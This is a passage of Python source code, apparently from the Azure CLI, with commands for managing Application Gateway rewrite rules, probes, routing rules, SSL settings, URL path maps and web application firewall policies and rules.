new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
Initialize custom rule for WAF policy
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
Add managed rule set to the WAF policy managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
Update(Override) existing rule set of a WAF policy managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
rg.rules = managed_rule_overrides # differentiate with add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
Remove a managed rule set by rule set group name if rule_group_name is specified. Otherwise, remove all rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
